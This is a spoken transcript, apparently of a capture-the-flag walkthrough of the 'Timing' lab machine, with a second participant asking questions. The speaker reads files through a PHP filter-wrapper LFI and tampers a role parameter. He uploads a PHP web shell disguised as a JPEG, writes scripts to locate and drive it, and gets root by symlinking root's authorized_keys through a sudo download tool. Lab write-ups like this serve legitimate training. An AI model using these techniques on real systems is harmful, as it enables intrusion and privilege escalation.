Alright, so working on this box timing. I'm going to spawn it in, set up a terminal session here, make a folder called timing. Let's start up a tmux session too. Tmux new -s timing. Need to be connected to the VPN. Do that there. Name this pane VPN so I can keep track of it. Make your nmap. I need the IP address of the target as well. One other thing I'm going to do is open up like a notebook so I can keep notes. Notes.md, writing in Markdown. It's called timing. Okay. Got the IP address. Come over here and I can ping that address. Just make sure it's up. Looks like it's not up yet. Why is it not up yet? Is my VPN down? Nope. Is it blocking ping? It might be blocking ping. Alright, whatever. Putting this into a file called target. I'm going to run an nmap scan. It says it's down. Maybe it's just not up yet. Oh, there it goes. Alright, ping is reaching. Let's retry that scan. Checking for open ports. Scanning the open ports for their service versions. Running an aggressive scan against it to see if I can pull banners. Alright, so 2 open ports. SSH, and it's running a web server. OpenSSH 7.6.1 Ubuntu. Let's wait for this last scan to finish. Alright, so let's pop up and see what's going on here. I'm gonna grab, actually no, that's good. So SSH and a web app is up. Let's go check out the web app. It's a login, admin, failed, I don't know, admin, password, failed, okay, I don't know. What else? Looking at this, it doesn't really look like it's showing much. I only really see mentions of login, so okay. So I'm going to try and brute force for directories now to see if I can find pages that aren't like exposed here. So I'll make a directory called GoBuster, and we'll say GoBuster dir. I will actually use this word list here, the URL. That'll do. So rather than have to paste in the IP address, I put it in a file called target. So I'm basically just saying like cat that. This will interpolate the IP address right into that string there. And I just did this box, so ignore some of my commands are auto-completing from what I did earlier. And I'm going to put this into GoBuster/, and I always call my scans the name of the word list I used when I scanned it. So directory list lowercase 2.3 medium.out, and I'm going to scan for mainly PHP. In fact, I'm not even going to scan for HTML. I'm only going to scan for PHP with 100 threads, and that's probably good. Okay, nice feedback. Let's make a note of what happens here. We'll say GoBuster. While that's running too, I will run whatweb against cat target, tee it to whatweb.out. Actually, I need to create that directory first. Okay, whatweb. Maybe some good feedback here. Let's see what this says. So it's Linux, gives me the Apache version. It's always redirecting to login. It's giving me a PHP session ID cookie. It found some emails on the page. Doesn't really look like it's valuable. And the title of the page. So nothing really useful there. Let's see what GoBuster says. 88% done. All right, I'm going to snag that. Put it in here. So what do we have here? It found a directory called images and an upload, a login, a logout, an upload, a profile, which is redirecting to login, so that's not accessible. I'm actually going to grab this list from a neater place. Yeah, right there is better. All right. So there's an image.php. So probably, I don't know exactly what this is doing, but probably rendering the image or something. And then there's this images folder. So I'm assuming probably somewhere in the images folder, it's actually going to store the images or something. Ran a directory brute force against web root. I want to try and test the same thing against, this time I'm not going to check PHP. And let's do that against, let's actually go in here and make a whole new folder inside GoBuster. Images. So I rerun that again. This time I'm going to use the same word list. Actually, I'm going to use a smaller word list just because I don't think I need it to be that big. Common. And this is going to scan not the root, but this time images. And we're going to output that instead of to that location. Let's put it in images / common PHP. We'll actually scan for there. .out. So PHP is good. Let's run. So I'll say down here, running a scan inside the images folder. Okay. Don't really care about these 403s. In fact, I know a better tool. FFUF, let's say images / and then -w user share word list there. Actually want to, oops. Let's make a directory FFUF. And we'll say FFUF, grab all that, images, -w, user share word lists, derb / common, -o will be putting it here, but let's make a directory for images. Kill that. We'll say -o is ffuf images, and we'll call it like common PHP maybe. -o f for output format all, and then we can say, I don't know, I don't care about the, so how do you do this? fs is for file size, C I think it is. Let me just check that. Yeah, FC is for filter HTTP status response codes. Cool. So FC, I don't want to see 403. I think that should do it. What did I do wrong? Let's see. W is entries. I have that. -u. FC 403. Oh, I forgot to put where I'm fuzzing in it. So in this command, you actually have to put in where you want it to stick the words. So put them right there. All right, so it did find actually an upload folder, and I can check that by saying ffuf images common.json, pipe that to jq dot results, and we'll say all dot URL, and we'll pipe that to sed and say s/escape that //g. All right, so this is what it found. I'll put that in my notes. So it found an uploads directory. So I'm assuming this is probably where image.php is storing or reading images from. Also indicates there is probably upload functionality. So, okay, moving on. I want to know more about this image.php first off, so I can try and fuzz that too. So this time, let's do image.php, and it's probably going to be something like file equals, and then some file name like image.jpg. I'm going to hit it with a certain word list. What am I going to use here? I suppose I can use dirbuster directory. Actually, I'll just use common again. Common. And where are we going to output this to now? So last time I put it in images. This time, let's say a new folder here. We can say make dir, how about, well, what are we doing? Common underscore, we'll say params dot common params, that's going to be the folder. So this time let's do all output formats. This time the folder is it's not images, it's common params / common params, all output formats, and let's see what happens. Oops, I forgot to put the fuzz thing again. I'm trying to figure out what this variable name is because you can't see that. If I actually went to this page, image.php, like there's nothing here, there's nothing to read. So you have to guess, like file equals like image.jpg. You have to guess what this variable is. I don't know it. That's what I'm going to do here, try and guess it. And again, I forgot to put the fuzz line. So since I'm guessing right here, that's where I'm going to fuzz. Okay, way too many there. So let's say I'm going to ignore the file size of 0. Don't want to see that. This is saying if the file size is 0, don't show me anything. All right, so that didn't work. Maybe there's LFI, // Etsy password. Let's try that. All right, so I was able to brute force that keyword there. This one's going to be common params / common params dot JSON to JQ dot results dot URL. Okay, so I was able to figure out that the keyword, the name there, is actually coming from. So we could say so fuzz for image dot php keyword to use the PHP script, and we found this. The keyword here being IMG. Found the name IMG to be the keyword. All right, now that I know that, I want to see if it's actually vulnerable. So what happens here when I'm going to go to this URL and see what happens. Okay, so it's definitely you're seeing something is going on here. It's detecting this attack. So let's think about this. It's PHP, I know. Let's go to like Hacker Tricks PHP wrapper. I forget how to do this. Something like this. Okay. LFI sequences. Wrapper. This is what I'm hoping for. So I'd like to try and get the file through this wrapper here. Let me grab this as an example. We'll say server is detecting LFI attempts using a PHP wrapper to obfuscate the LFI exploit. As an example, this is not what I'm hoping for, though. It's actually going to be, how do I say this? I think it's base64-encode resource equals the name that you want. So, let's test it out and see if this works through the fuzzer. So this time we know it's, this is where we want to fuzz right here. And this is IMG, and we want to use that, what is it, PHP : / filter / base64-encode / resource equals fuzz. And I'm actually going to use a different name. We'll still do output all formats, but the word list I want to use is going to be different because I'm going to attack LFI. So we'll say sec lists fuzzing LFI, and then we can say graceful security Linux. We know it's Linux because that was given to us by what web? Yeah, Ubuntu Linux. And then the output directory, which I'm going to create a new one right here. We'll say LFI. I like to use the same name as this. And then underscore. Actually, that's probably good. So coming back up here, I'm going to stick it in that folder where all the output's going to go. All right, hopefully we get something good here. Okay, a lot of shit going on there. Let's again hide the file size of 0. Don't care about empty. It looks like it's working because all of these have different amounts of words and different amounts of lines, so I think it is working. But we can test it out by first of all just going and grabbing. Let's just get a list of, say, LFI JSON JQ dot results dot URL. So any one of these will do. I'm going to grab this one, copy link address, back to the browser, and let's test it right there. Okay, so that definitely worked. This is a file on the system. Cool. I'm actually going to save this file. I'll actually set up a curl to do this too. Name this pane LFI. So we'll say curl minus s. I already have this saved, so to save the effort here, resource equals /etc/password. And so if we just do that and I run it, it comes back as base64 because that's how I'm obfuscating it. It's not detecting. So I need to convert it out of base64 now. So I'll pipe it to a decode. And that should give me the file on my side, and I want to put that in LFI as the password. So now if I can look at it on my end. This is all the users in the system, but I only am concerned about the ones that have the ability to read from a bash pipe. So there's 2 users that I found, Root and Aaron. So that's a good find there. Let's put this in the notes. Okay. We can say server is vulnerable to LFI. Let's make a new section here. So what did we just find? Found /etc/password and users with shell. All right, so Aaron is a user in the system now. I wonder if he's also a user in the login. Oops. Aaron, password. Okay. Aaron, I don't know. Testing. About Aaron. And that worked. Okay, cool. So put that in the notes too. Attempting to log in with user and password being the same. We'll say login.php credentials user Aaron pass Aaron. All right. So cool. Able to get in, logged in as user 2. Let's go and look around at some of these files here. So now I have the ability to read the files out, but I need to know what I'm reading. First of all, image.php. Let's see what that's doing. Image.php. No, that didn't work. Is it on the root? It should be. Guess it can't read itself. Let's try upload.php. This didn't look like it worked. Oh, I know why. I have to do this through the LFI. So pull that curl up again. And this time, let's change this file path to like image.php. There we go. What does this give us? It basically just gets the image, and it's not really that useful. Okay, how about, I don't know, upload.php. That was another file that we found. Let's take a look at this one. So first of all, here's an include. Let's just grab this. I'm going to save this file actually. Write that to lfi upload.php. All right, this way I can just do it. I can look at it like this. And I can pull it up over here. So this is being imported. Make a note of that. Investigating upload backend source code. So that's getting found. Let's actually just use the entire line. So I need to check that file out because it's including it. What else is happening in here? It looks like when it uploads, it's taking an MD5 sum of the file hash and adding the time into it and creating a hash out of the time in the file hash, and then storing it with an underscore and then the file that you uploaded's name. So this is good stuff. Let's grab all that. Put that in here. What else? It also checks to see if it's a JPEG. If it's not a JPEG, it doesn't allow it. Let's put that in there too. Okay, so that's how you use the upload. But what else? And then it actually uploads it. All right, so let's check this file out. Again, changing the file name to this one. And yeah, I'm going to store that too. Cat LFI, admin, check. So this actually has an upload too. Let's pull it up over here. This has an include. So let's grab that. What's it? Admin auth check. So in my notes, I'll say investigating admin auth check.php backend source code. And this just is saying it's taking this ID, it's taking this value called role out of the session, and if it's checking to see if it's equal to 1 or not. And I'm assuming, okay, so you can only upload if your role ID is 1. So we'll just grab this too and put it in the notes. Make a note down here and say like, can only upload files if role, here, let's make that, if role is set to 1.
So I'm late to the party, but is role, is that going to be like a parameter in the HTTP request when you upload the file?
Yeah, so I don't know yet. This is coming out of the session. So, I mean, I can try, like,
Like like the cookie?
I don't know.
Hmm.
Let's see, roll.
Looks like it's not using cookies. Maybe.
And then if I go home again, no, it still says I'm logged in as 2, even with the roll. But let's keep investigating here because there's some other pages I wanted to check out too. So this one, first off, because this is being included here, so there's probably more information there as well. So I'm going to take this same thing again and just switch the file to this one. And I've already done this, so it's remembering my commands, but I'll save it locally. Cat LFI, auth, checkup. Again, I'm going to pull it up over here. So this one, what is this doing? Setting the cookie, starting the session, and if user ID is not set and the request URI is login.php, if that's false, it's going to, this is why it keeps redirecting. All right, so that's good to know. Let's go to edit profile. And what the hell is happening at edit profile? Let's grab that too. So maybe that's where you can edit. What's the link? Profile.php. And I'll save that in profile. Pull it back up over here. All right. dbcon, that's actually, I want to see that too. Might as well just grab it and save it. Okay. Pop that open too. What was the other one? Oh, profile. So this is using dbcon. So what is this doing? So here's a password. Let's try and log in with it. SSH Aaron cat target. Yes. Paste. Nope. How about root? Paste. No. Okay. So I'll make a quick note of that too. Found my SQL DB password in, what's it called? dbcon.php. Doesn't work on SSH. How about on the actual? Let's log out. Aaron, or I already know the password for Aaron. How about root? I like how it doesn't hide your password. How about admin? All right then, so that's settled. Aaron, back to edit profile. So, or login. So don't know what that is, but maybe it comes in handy later. Close this for now, don't need it. All right, looking at profile, let's see. SQL prepared statement, so it's not vulnerable to SQL injection. Let's see. It's pulling in some JS. I'm gonna grab that. Probably to help with the actual form, I'm assuming. Oh no, here's the input. Here's another input. And yeah, it's all that form is getting sent through it's getting sent through JavaScript. So let's change this to JS profile.js and save it in. Right there. Pull that up too. Update profile. New XML HTTP request. Don't care. Post to, okay, so this is where it's getting posted to. Might as well grab that too. I'll pull that up as well. Damn it, I needed that other one. All right, back to JS. Making a post request, application form, first name, it's grabbing the first name, okay. And company. All right, so that's just sending the form, not really interesting. Back in profile, this is also just really not interesting at all. Auth check, not useful. This admin auth is just setting the role to 1, so I have to keep that in mind. And then the upload code I'll leave up for now. So looking at this new one, we already have the auth check. That's, I guess, checking for the role. Let's see, what else is this doing? Including the connection for the database. And here's the parameters that it's using, right? And apparently role is getting set automatically. Or actually, no. So here, let me grab this code. Put it in the notes. Investigating, what is that? Profile update.php backend source code. All right, so what's interesting about this is that it's checking to see if you specify role in the post. And if you do, then it's setting it to whatever you set. So, okay, I think that's exploitable. Let's send this through burp. All right, proxy's on. Let's change these values. Admin, I don't know, admin, update. So you have to actually click the button. All right, so this is the request. Why don't I save this? Yeah, I better save it. Make a note, why not? Let's say tampering with the, what is it, the profile update.php post request. Boom. Actually, I can do better than that. We don't need a lot of this shit. Don't need it. Don't. Oh, need that. Don't need this. Don't need that. All right, that's nice and lean. Go back over here, do the same thing. Don't need the refer. DNT don't need. Codings don't need. All right. And I'm going to add that role equal to 1 here. And pop that in here too. And role equals 1. Forward. Back to the browser. Profile is updated successfully. Let's go home. Turn that off. Admin panel. All right, so it still says I'm logged in as user 2, but now I have this admin panel. So we'll say tampering request shows admin panel on home page. So this is the update functionality using avatar uploader.php. Might as well grab that, I guess, yeah. I don't even think I got this file in my first run through, but let's see. Grab that, pull it up in here. So this is pretty much done. It did what it needed to do. Avatar uploader. All right, uploading the auth check again, which is why I'm able to see it. It's using more JS. I really don't even feel like fucking doing it, but whatever. Might as well just grab it. Paste there. Paste there. Run. Back over here. Avatar. Okay. Ah, fucking JavaScript. There's so much of it. Do upload. Don't care. Don't care. Don't care. Don't care. Post to upload.php. All right. So all the data is getting posted to upload.php. So that'll be this. But let's see, does this do anything else that I need to care about? Bootstrap, don't care. Yeah, I don't care about that. And actually, I don't really care about that either. We know a post request is coming in here. So looking at this, right, and it's going to images / uploads. So now looking at this file, this is where I had made a note before of these lines right here. So let's look at what this is doing. It's taking the MD5 of, here's a problem. It's trying to take the MD5 of this file hash, except this is a bug, and I'll prove it too. So I'm going to run it PHP interactively, and just as a sample, I can say test on that, right? Okay. So we're looking at that bug, right? And the bug said something like, file hash, and let's just say that's equal to like, this is a hash, right? Whatever, it doesn't matter what's on the other side, actually. Damn it, I forgot about the fucking semicolons. All right, so that's stored in a variable, right? If I say that, right, we get the data out of it. All good so far with that. Now, if I put this in quotes, we get the interpolation, but if I put it in single quotes, that's a problem. So looking back at this is bugged right here. This is bugged. It's not doing what they think it's doing. But it's taking the MD5 sum of this word file hash and then the time right now. So what does the time right now actually do here? I probably have to import it somewhere or something. Or maybe actually echo that. Okay, so it's just an integer of the time right now. There's no decimals. It's just the time right now as an int. Okay. That's probably good for that. Fix my terminal. Hashing those together in an MD5, and then adding a underscore onto the hash, the MD5 hash, and then adding the name of my file at the end, and then putting that file at the upload dir, which is images / uploads. So what this means is that every second the hash is going to change. So with that being said, I'm going to need some way to track the changing of that. So let's make a new directory here called scripts. And inside of there, I'm going to write like, I don't know, we'll call it generate hashes.py. So we can say, first of all, I need hash lib, and I need time. And what are we doing here? It's going to be something like while true, like in a loop. All right. Try pass except. I'm going to wait for a keyboard interrupt so I can stop it when I'm ready. Interrupt, and we'll say print nothing and break. Or just say exiting with a new line in front. And then inside of here, it's going to be something like, I don't know, print. So it's hashlib.md5. We want to get the hex digest of that. And then it was, an F string here. And if you remember, it's the actual word file hash because they fucked it up. And that's going to be concatenated with the time right now. Time. That's a float, so it's a decimal. We have to convert it to an integer. And then back to a string. Encode that. I think that'll work. Take the hex digest, and we'll put a little message in the front here. Actually, I need to put these on different lines.
What's a hex digest?
The hex digest it takes it actually, so without the hex digest, you're getting a binary MD5 string. Like the hex digest will pull it out into a format that you're used to seeing with like 32 characters. So we'll call this the payload here, because that's really what that is. And in here, we're going to encode the payload and get the digest. So we'll just call this digest is equal to that. And then we'll print out, like, I don't know, hash digest. So that'll print it, but I want to keep track of those in a file, actually. So let's put this whole fucking loop inside of a with open, I don't know what we're going to call it. How about like hashes.txt in write mode as file. Then down here, after I print, it's a file.write. And we'll say digest and a new line. Okay, I think that'll do. So if it receives a keyboard interrupt, in other words, if I hit Control-C, it'll end it and close the file on the way out. I think that should do it. So let's test it, make sure it works. I'm going to keep this terminal open here. Make a new pane here and call it, I don't know, Python. Okay, so that, all right, so it's spamming too fast. So I'm going to time.sleep here. I think it'll only create a new one every second. So this should create 2 at a time of the same. Yeah, see how it's like they're doubling? That means that it's only 1 second. So every second, it'll create a new hash. So while that's running, I can keep track of the time in hash form. And by the way, this is the digest, in case you were wondering. All right, and then it keeps creating this hashes file, so I'll be able to keep track of that. Cool. So I want to upload. So let's relook at. I want to look at these notes again real quick. It checks to see if it's a JPEG. So I need to make a web shell or something. So let's say like vim. We'll call it malware.php or malware. Actually, this has to be .jpeg actually. Well, I'll start it in PHP so I get code highlighting. And we'll just do PHP. And this can say system. And then in here I'll do a, I don't know, make a request. This way I can do post if I want to. And the keyword will be CMD. Cool. It's a backdoor. So let's actually move that because it's a stupid name. Call it shell.jpg. Cool. Let's move that shell.jpg to my home directory desktop because my browser can't see root. So I have a way to generate the hashes. Cool. Let's start actually doing that then. Generate hashes. All right, so that's generating. So if I come back over here, let's select the file and upload it, which has been uploaded. Let's go back to the home. I can stop with the hashes. All right, so one of these hashes is going to correspond to the file path where that's getting stored. Because if you remember, it gets stored in this directory with the file name of the hash, then an underscore, then my file name. So I need a way to retrieve that. Let's make another file, another script, I guess. Call this locate web shell.py. So this one I'm going to need requests with open, what did I call it? Hashes.txt. In read mode as rs file, we'll say hash list is equal to file.read, strip the last new line and split it on the new line. Should give me a list of hashes. We have a base URL, which is http:// I don't even fucking know what the IP is. This slash image.php question mark img equals images slash uploads slash, let's leave that off, for current in hash list. I'm going to loop over the hashes past there, make the new line at the end. We can say the URL is equal to an f string of the base URL slash the current hash. And remember, it was underscore and then my file name, so .jpg. And cmd equals ID, we'll say. Resp equals requests.get the URL. Allow redirects false. So I need to now know which hash it is. So we'll say if resp.text print, found, and I'll just put in the URL in there. Here, I'll make this nice and fancy too. Found with a plus there. We can break the loop right there if it ends. Else, we'll print minus did not find with the URL that it tried. And then down here, if the break doesn't hit, we'll just say could not find the shell. Okay. Let's see if that works. Locate it now, please. All right, cool. Found. I haven't been making notes. Uploaded PHP web shell with .jpg suffix. Found the associated hash created by upload.php. So if all that worked, should be able to come over here and hit that. And now I have a backdoor in here. So let's figure out what's going on. I could actually make I can make a dirt shell here. Scripts, call this dirt shell .py. A lot of this code is going to be the same too. Don't need that. Don't need that anymore. Just copy all that. So this base URL, now we know the path, which is what it's in the notes. Boom, and then I'm injecting right onto the end of it, so we can say don't need any of this, but this should be a while loop, while true. We can say try. None of that. Except keyword interrupt. We'll print exiting again. Break there. And now that I have this response, we can say print resp.text. Let's see how that works. And I don't need to open this file anymore. Okie dokie, hopefully that works out. Let's try. Oh, and I need an input. So let's say cmd equals input dirt. And the CMD has to come on the end of that URL. All right, I think that should work. Let's see. LS, nice. Okay.
Nice, man.
Yeah, bro, for surely. So we already have the Etsy password file. I already know what users are on the system. Pretty much already have all the files in this directory. Okay, just to save the trouble here, because I don't want this to take forever, I did find in /op there's this backup file.
So is it automatically like URL encoding all your commands, and that's
Yeah, so that's it happens automatically in requests, but you have to know that, otherwise, yeah, you're gonna sit there and struggle with URL encodings. Yeah, if you did this, any other request does that for you. So I'm gonna copy that file /opt/ source files backup.zip. I'm gonna copy it to /var/www/html. Now I should be able to just go to my browser and just grab it. Nice. Grab that. Back here, we'll call this dirt shell. Keep that open. Make a new pane here. Moves /home downloads. Yep, already had it. We'll call this I don't know, exploits. Move source to exploits. Unzip it. All right, so I saw some git in there. So we come in here. It looks like it's the same thing as the web folder. So I do a git status. It's a git repo. So I can say git log minus one line, for instance. So there's two commits. There's an init, and then there's the dbcon being updated. And the dbcon is the one with the password in it. So probably they updated the password. Let's see. So I think you can do a git diff on the initial commit, and it will show you the differences made between another commit next to it, all the changes since then. So if we do that, we can find that the diff shows a password here. Secret, unguessable password. Let's make a note of that. Found backup file in /opt. Moved to web root. Git repo discovered, and diff reveals password. Okay. Let's try it and see if it works, and then log it. So let's say SSH Aaron paste. Okay, SSH shell works. Make a quick note of that. Leaked credentials work for SSH with Aaron. Okay, nice. All right. First thing I like to do is put my keys in there so I don't have to keep using the password. So over here, mkdir.ssh wget http 10.10. Fuck, who am I? 14.111. 14.111. Port 18001. ID rsa.pub. I'm going to write that into authorized keys. So now I should be able to just get right in. Oops, I am not in the right directory. Let's exit there. All right, now I don't need a password. Back up here, I can quit that out.
Wait, did you not have to specify a private key when you
No,
did that?
no, because authorized keys, it means if it's that has my public key in it. No, I didn't have to specify a private key because that key was actually my like official. That's my roots.ssh, like my,
Oh, okay, I see.
yeah. So, all right, we got the user flag there. Copy that into mkdir flags, echo, flag into flags user.txt. Nice. All right, moving on. Well, anytime I have the password for SSH, which was, I should probably make their creds echo Aaron into creds ssh.txt. And we'll say Aaron. And then echo. I try and put those somewhere where I remember them instead of having to come back to that file every time. Into. All right. Now it's on my clipboard. So I always check sudo because I have the password and I didn't even need it. So this user is allowed to run this netutils as root. So sudo -u root this -h. Let's cancel that. First of all, what is this thing? It's a bash script. And it is owned by root and readable, so I can read that. Running java -jar /root netutils.jar. All right. Well, one thing I know is that it's not using, but it's through sudo. I was going to say it's not using the full path to Java. So I could do something like echo path. I could say, I'm going to take that whole line, show you a cool trick here. I don't know if this is going to work. I actually didn't try this in my first run through here. I'm going to say export path old equals the current path. So if I echo path
So,
old.
sorry to interrupt. Can you explain just what the path means? Because like I know like user slash local slash sbin, right? I know these are all directories, right?
Mm-hmm.
For binaries, but like what exactly does this mean?
It means that
Just echo path and look at that.
yeah, so if you specify, if you have a folder in your path, it means that you don't have to like specify the full path to like ls. Like the reason you can ls is because ls exists in one of these directories.
Oh, okay, I see.
So without it being there, here, watch this. I'm going to say,
So all of the binaries we use are in those directories.
yeah. So if I
Typically.
export path to nothing now, here, check this out, ls.
Oh, okay, I see.
Uh, see now, I think pwd. See now, why is that working? Is my question. Exec shell maybe.
So you'd have to put the full path to the binary then if you don't have anything in your path variable.
Yeah, so see how there's now my path is busted. See that? There's nothing in
Gotcha.
it. It's just nothing. Unset, there's nothing in it. But what I want to do is say, first of all, can I export still? Export path equals /home/Aaron. So now, yeah, so it's not seeing this in the path. /bin/ls. I have to actually specify the full name now. bin slash vim. I probably should have done this first. Vim, we'll say Java. God damn it. I really should have done this first. Yeah, let's do it after. Export path equals path old. I'm just going to restore it. Yeah, now I should have all my shit. All right, Vim, Java. This is going to be a, what is this going to do? So if that script is calling Java and I call it, it's going to try and run Java. Well, let's make this a slash bin slash bash and do something like, let's say copy Aaron slash .ssh slash authorized keys over to slash root .ssh slash, yeah, that should do. And then cat it just to make sure it worked. Okay, so one other thing I want to do there. Which cat?
So are you going to try and replace the Java binary so it's a bash script that writes your key, Aaron's key, as the root key,
Yeah,
which is your key? So,
that's right.
oh shit.
Slash bin slash, right? I didn't do this the first time around. I did this, by the way. I figured out how to exploit the binary that I had sudo for, but I'm going to see if this works. All right, run that. So that has the full paths now. We just have to say 777 Java. All right, let's try it out. Export path equals slash home slash Aaron, and then slash sbin slash sudo. Oh, I didn't save what the name of that thing was. User bin net utils, I think it was. Bin? Oh no. God fucking damn it. All right, so user bin sudo, that's right. All right, exporting path to home. I broke my thing again, so slash user slash bin slash sudo minus u root. That's the path, run. And it didn't work. Okay, so much for that. Path equals path old restored. All right, don't need Java. Okay, so back to trying to figure out that binary, I guess. Sudo minus u root, run. Select one of the options, HTTP. Let's just test something. Touch tmp.dat. HTTP :/10.10.14.111:1801/tmp.dat. If I quit, all right, it moves the file right into my directory. So probably overwrites as well. I really got to save this fucking line. 10.10.14.111:1801/tmp.dat. Okay, so it made a new one. Okay. And it's getting saved as here, I don't need this open. It's getting saved as root, readable by root. All right, so that would mean that there's pretty much no way I can get a binary in because it will only ever save it with read and write permissions for root only. Not good. One trick you can do is make a symlink to wherever you want something to go. So for instance, like Etsy Shadow to, let's just say, I don't know, file, right?
Yeah, I remember working through this part. I wasn't there for the foothold, but
Yeah, so you can say this
yeah,
is a symlink and it's attached to something that exists. So it will work. So if I say cat file, I don't have permission to, but I can remove file, right? And that will remove the symlink.
we do like a symlink to the root user's authorized keys, right?
Yep,
Something like that.
that's what I was thinking. Authorized keys, right? Link it. Oops, that's not right. Let's link that to ln authorized keys, and we'll put it as like id rsa.pub because that's what it's going to come in as.
Right.
So if I look at that now, it's a busted link. Okay, let's try it out. So here, let's just do the thing I told you. Control R, sudo, run that one, and the URL is going to be coming from here. 10.10.14.111 1801/id rsa.pub. Exit there. Drop down here, kill this, exit there. Okay, so the symlink did not break, meaning probably the file actually did get written. It followed the symlink. So if that's true, then I should be able to, oops, I should be able to SSH in as root, which I can. Boom.
Nice job, man.
Yes, sir. There's the root flag.
Dude, this just makes me realize like I need to learn Python
It's like
and PHP.
it's a necessity.
Yeah, because
Clean your tracks.
I realize this is the barrier, right? Like for more difficult boxes.
Oh yeah, no, for sure. Okay.
Like you have to know how to read code and write code.
Yeah, you can just make your life a lot easier. Like you saw me set up that dirt shell and generate everything, right? So close the VPN off, drop out of that
Yeah,
shell.
like I would have just been, using an online URL encoder and just like burp repeater and just like copy pasting stuff in there. Then maybe try and do like a bash reverse shell
I think
or
I'm getting there.
try and write to authorize keys for Aaron.
All right, that should be good. And after all that hard work, I already have a copy of all that shit that I did, so I take great notes. So that's it. By the way, I was recording all that.